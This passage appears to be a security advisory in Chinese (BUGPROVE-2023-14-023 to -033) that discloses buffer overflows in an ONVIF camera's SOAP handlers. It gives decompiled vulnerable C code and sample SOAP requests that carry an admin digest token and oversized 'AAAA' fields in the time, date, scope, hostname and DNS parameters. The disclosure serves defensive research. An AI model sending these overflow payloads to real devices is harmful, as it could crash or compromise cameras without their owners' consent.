<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
<DateTimeType>Manual</DateTimeType>
<DaylightSavings>false</DaylightSavings>
<TimeZone>
<TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
</TimeZone>
<UTCDateTime>
<Time xmlns="http://www.onvif.org/ver10/schema">
<Hour>AAAAAAAAAAAAAA.........</Hour>
<Minute>29</Minute>
<Second>55</Second>
</Time>
<Date xmlns="http://www.onvif.org/ver10/schema">
<Year>2023</Year>
<Month>3</Month>
<Day>7</Day>
</Date>
</UTCDateTime>
</SetSystemDateAndTime>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-023
存在漏洞的代码如下:
参考 BUGPROVE-2023-14-018.
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
<DateTimeType>Manual</DateTimeType>
<DaylightSavings>false</DaylightSavings>
<TimeZone>
<TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
</TimeZone>
<UTCDateTime>
<Time xmlns="http://www.onvif.org/ver10/schema">
<Hour>12</Hour>
<Minute>AAAAAAAAAAAAAAAAAAAAAAA................................</Minute>
<Second>55</Second>
</Time>
<Date xmlns="http://www.onvif.org/ver10/schema">
<Year>2023</Year>
<Month>3</Month>
<Day>7</Day>
</Date>
</UTCDateTime>
</SetSystemDateAndTime>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-024
存在漏洞的代码如下:
参考 BUGPROVE-2023-14-018.
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
<DateTimeType>Manual</DateTimeType>
<DaylightSavings>false</DaylightSavings>
<TimeZone>
<TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
</TimeZone>
<UTCDateTime>
<Time xmlns="http://www.onvif.org/ver10/schema">
<Hour>12</Hour>
<Minute>29</Minute>
<Second>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA...................</Second>
</Time>
<Date xmlns="http://www.onvif.org/ver10/schema">
<Year>2023</Year>
<Month>3</Month>
<Day>7</Day>
</Date>
</UTCDateTime>
</SetSystemDateAndTime>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-025
存在漏洞的代码如下:
参考 BUGPROVE-2023-14-018.
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
<DateTimeType>Manual</DateTimeType>
<DaylightSavings>false</DaylightSavings>
<TimeZone>
<TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
</TimeZone>
<UTCDateTime>
<Time xmlns="http://www.onvif.org/ver10/schema">
<Hour>12</Hour>
<Minute>29</Minute>
<Second></Second>
</Time>
<Date xmlns="http://www.onvif.org/ver10/schema">
<Year>AAAAAAAAAAAAAAAAAAAAAAA...........</Year>
<Month>3</Month>
<Day>7</Day>
</Date>
</UTCDateTime>
</SetSystemDateAndTime>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-026
存在漏洞的代码如下:
参考 BUGPROVE-2023-14-018.
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
<DateTimeType>Manual</DateTimeType>
<DaylightSavings>false</DaylightSavings>
<TimeZone>
<TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
</TimeZone>
<UTCDateTime>
<Time xmlns="http://www.onvif.org/ver10/schema">
<Hour>12</Hour>
<Minute>29</Minute>
<Second></Second>
</Time>
<Date xmlns="http://www.onvif.org/ver10/schema">
<Year>2023</Year>
<Month>AAAAAAAAAAAAAAAAAAAAAA..............</Month>
<Day>7</Day>
</Date>
</UTCDateTime>
</SetSystemDateAndTime>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-027
存在漏洞的代码如下:
参考 BUGPROVE-2023-14-018.
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetSystemDateAndTime xmlns="http://www.onvif.org/ver10/device/wsdl">
<DateTimeType>Manual</DateTimeType>
<DaylightSavings>false</DaylightSavings>
<TimeZone>
<TZ xmlns="http://www.onvif.org/ver10/schema">PST8PDT,M3.2.0,M11.1.0</TZ>
</TimeZone>
<UTCDateTime>
<Time xmlns="http://www.onvif.org/ver10/schema">
<Hour>12</Hour>
<Minute>29</Minute>
<Second></Second>
</Time>
<Date xmlns="http://www.onvif.org/ver10/schema">
<Year>2023</Year>
<Month>5</Month>
<Day>AAAAAAAAAAAAAAAAAA...........</Day>
</Date>
</UTCDateTime>
</SetSystemDateAndTime>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-028
存在漏洞的代码如下:
void set_scope(char *param_1,char *param_2,int param_3)
{
char *pcVar1;
char *pcVar2;
int iVar3;
char *__dest;
size_t sVar4;
char cVar5;
pcVar1 = (char *)key_value_given_by_user_fine(param_2,"Scopes",0);
pcVar2 = strstr(param_2,pcVar1);
pcVar2 = pcVar2 + 1;
cVar5 = '\x14';
while (pcVar1 != (char *)0x0) {
iVar3 = strncmp(pcVar1,"onvif://www.onvif.org/type/video_encoder",0x28);
if ((((iVar3 == 0) ||
(iVar3 = strncmp(pcVar1,"onvif://www.onvif.org/type/audio_encoder",0x28), iVar3 == 0)) ||
(iVar3 = strncmp(pcVar1,"onvif://www.onvif.org/type/recording",0x24), iVar3 == 0)) ||
(((iVar3 = strncmp(pcVar1,"onvif://www.onvif.org/type/ptz",0x1e), iVar3 == 0 ||
(iVar3 = strncmp(pcVar1,"onvif://www.onvif.org/Profile/Streaming",0x27), iVar3 == 0)) ||
(iVar3 = strncmp(pcVar1,"onvif://www.onvif.org/hardware/",0x1f), iVar3 == 0)))) {
free(pcVar1);
notsupported(param_1,"ter:OperationProhibited","ter:ScopeOverwrite",
"Scope parameter overwrites fixed device scope setting, command rejected.");
return;
}
iVar3 = strncmp(pcVar1,"onvif://www.onvif.org/location/",0x1f);
if (iVar3 == 0) {
pcVar1 = pcVar1 + 0x1f;
__dest = (char *)(param_3 + 0x697);
LAB_00014dd0:
strcpy(__dest,pcVar1);
}
else {
iVar3 = strncmp(pcVar1,"onvif://www.onvif.org/name/",0x1b);
if (iVar3 == 0) {
pcVar1 = pcVar1 + 0x1b;
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetScopes>
<Scopes xmlns="onvif://www.onvif.org/name/">AAAAAAAAAAAAAAAAAA............</Scopes>
</SetScopes>
BUGPROVE-2023-14-029
存在漏洞的代码如下:
void add_scopes(char *param_1,undefined4 param_2,undefined4 param_3)
{
int iVar1;
char *pcVar2;
undefined4 local_14;
pcVar2 = param_1;
local_14 = param_2;
do {
iVar1 = key_value_given_by_user_fine(local_14,"ScopeItem",&local_14);
if (iVar1 == 0) {
sprintf(param_1,
"<?xml version=\"1.0\" encoding=\"UTF-8\"?><soap:Envelope xmlns:soap=\"http://www.w3.o rg/2003/05/soap-envelope\" xmlns:trt=\"http://www.onvif.org/ver10/media/wsdl\" xmlns:t ds=\"http://www.onvif.org/ver10/device/wsdl\" xmlns:tt=\"http://www.onvif.org/ver10/sc hema\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xs=\"http://www.w 3.org/2001/XMLSchema\"><soap:Body>%s</soap:Body></soap:Envelope>"
,"<tds:AddScopesResponse></tds:AddScopesResponse>");
return;
}
iVar1 = messwithscopes(param_1,iVar1,param_3,1,pcVar2);
} while (iVar1 != 0);
return;
}
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<AddScopes>AAAAAAAAAAAAAAA.............</AddScopes>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-030
存在漏洞的代码如下:
void remove_scopes(char *param_1,undefined4 param_2,int param_3)
{
int *piVar1;
char *pcVar2;
int iVar3;
int iVar4;
char *pcVar5;
int iVar6;
int iVar7;
int iVar8;
char *pcVar9;
char acStack8232 [8196];
memset(acStack8232,0,0x2000);
pcVar2 = (char *)key_value_given_by_user_fine(param_2,"ScopeItem",0);
iVar7 = 0;
LAB_00014aa8:
if (pcVar2 == (char *)0x0) {
sprintf(param_1,"<tds:RemoveScopesResponse>%s</tds:RemoveScopesResponse>",acStack8232);
return;
}
iVar6 = 0;
iVar8 = param_3;
do {
piVar1 = (int *)(iVar8 + 0x700);
iVar8 = iVar8 + 0x84;
if (*piVar1 == 1) {
pcVar9 = (char *)(param_3 + iVar6 * 0x84 + 0x704);
iVar3 = strcmp(pcVar9,pcVar2);
if (iVar3 == 0) break;
}
iVar3 = strncmp(pcVar2,"onvif://www.onvif.org/type/video_encoder",0x28);
iVar6 = iVar6 + 1;
if (iVar3 == 0) {
LAB_00014a48:
free(pcVar2);
pcVar2 = "ter:FixedScope";
pcVar9 = "ter:OperationProhibited";
pcVar5 = "Trying to Remove fixed scope parameter, command rejected.";
goto LAB_00014a84;
}
iVar3 = strncmp(pcVar2,"onvif://www.onvif.org/type/audio_encoder",0x28);
iVar4 = strncmp(pcVar2,"onvif://www.onvif.org/type/ptz",0x1e);
if ((iVar3 == 0 || iVar4 == 0) ||
(iVar3 = strncmp(pcVar2,"onvif://www.onvif.org/hardware/",0x1f), iVar3 == 0))
goto LAB_00014a48;
if (iVar6 == 0x14) goto LAB_00014a6c;
} while( true );
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">t9z8Eni3FtbMprKNewcUu3tRnvQ=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0l8ABAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-21T00:57:56.462Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<RemoveScopes>AAAAAAAAAAAAAAAA..........</RemoveScopes>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-031
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1"
xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password
Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">
sVIn3t8kC5XqSCgf2ae7jJqhs/M=</Password>
<Nonce
EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">
iDAloMnFT0CHyXsPmtq0l1oCAAAAAA==</Nonce>
<Created
xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
1970-04-21T02:34:51.939Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"><GetNetworkInterfaces
xmlns="http://www.onvif.org/ver10/device/wsdl" />AAAAAAAAAAAAAAAA............</s:Body>
</s:Envelope>
BUGPROVE-2023-14-032
存在漏洞的代码如下:
void FUN_0001599c(char *param_1,undefined4 param_2,int param_3)
{
char acStack1048 [1024];
memset(acStack1048,0,0x400);
sprintf(acStack1048,"/cgi-bin/admin/param?action=update&%s=%s","General.Network.HostName",param_2)
;
FUN_0001d220(acStack1048,*(undefined2 *)(param_3 + 0x122e));
FUN_0001d27c(param_2);
sprintf(param_1,
"<?xml version=\"1.0\" encoding=\"UTF-8\"?><soap:Envelope xmlns:soap=\"http://www.w3.org/2 003/05/soap-envelope\" xmlns:trt=\"http://www.onvif.org/ver10/media/wsdl\" xmlns:tds=\"htt p://www.onvif.org/ver10/device/wsdl\" xmlns:tt=\"http://www.onvif.org/ver10/schema\" xmlns :xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xs=\"http://www.w3.org/2001/XMLSc hema\"><soap:Body>%s</soap:Body></soap:Envelope>"
,"<tds:SetHostnameResponse></tds:SetHostnameResponse>");
return;
}
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">BKH8Bi1D5C/KScBE6amTEbjDlUE=</Password>
<Nonce EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">iDAloMnFT0CHyXsPmtq0lyUAAAAAAA==</Nonce>
<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">1970-04-15T07:37:37.652Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetHostname xmlns="http://www.onvif.org/ver10/device/wsdl">
<Name>AAAAAAAAAAAAAAAAAAAAAA................</Name>
</SetHostname>
</s:Body>
</s:Envelope>
BUGPROVE-2023-14-033
存在漏洞的代码如下:
iVar1 = strcmp(param_3,"SetDNS");
if (iVar1 == 0) {
memset(dnsmanual,0,0x200);
memset(acStack440,0,0x40);
memset(fromdhcp,0,0x40);
memset(local_b0,0,0x40);
memset(domain,0,0x100);
lookup_field_xml(document,&DAT_000332f4,fromdhcp);
iVar6 = lookup_field_xml(document,"DNSManual",dnsmanual);
iVar1 = lookup_field_xml(document,"SearchDomain",domain);
if (iVar1 != 0) {
memset((char *)(param_4 + 0x597),0,0x100);
strcpy((char *)(param_4 + 0x597),domain);
示例负载如下:
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope">
<s:Header>
<Security s:mustUnderstand="1" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">
<UsernameToken>
<Username>admin</Username>
<Password
Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordDigest">
OQVQa48ZhUh04oiQkPeU514MpSU=</Password>
<Nonce
EncodingType="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary">
iDAloMnFT0CHyXsPmtq0l3YAAAAAAA==</Nonce>
<Created
xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">
1970-04-15T08:28:59.557Z</Created>
</UsernameToken>
</Security>
</s:Header>
<s:Body xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xmlns:xsd="http://www.w3.org/2001/XMLSchema">
<SetDNS xmlns="http://www.onvif.org/ver10/device/wsdl">
<FromDHCP>false</FromDHCP>
<DNSManual>
<Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
<IPv4Address xmlns="http://www.onvif.org/ver10/schema">192.168.1.254</IPv4Address>
AAAAAAAAAAAAAAAAAAAAAAA................
</DNSManual>
<DNSManual>
<Type xmlns="http://www.onvif.org/ver10/schema">IPv4</Type>
<IPv4Address xmlns="http://www.onvif.org/ver10/schema">8.8.8.8</IPv4Address>
</DNSManual>
</SetDNS>
</s:Body>
</s:Envelope>
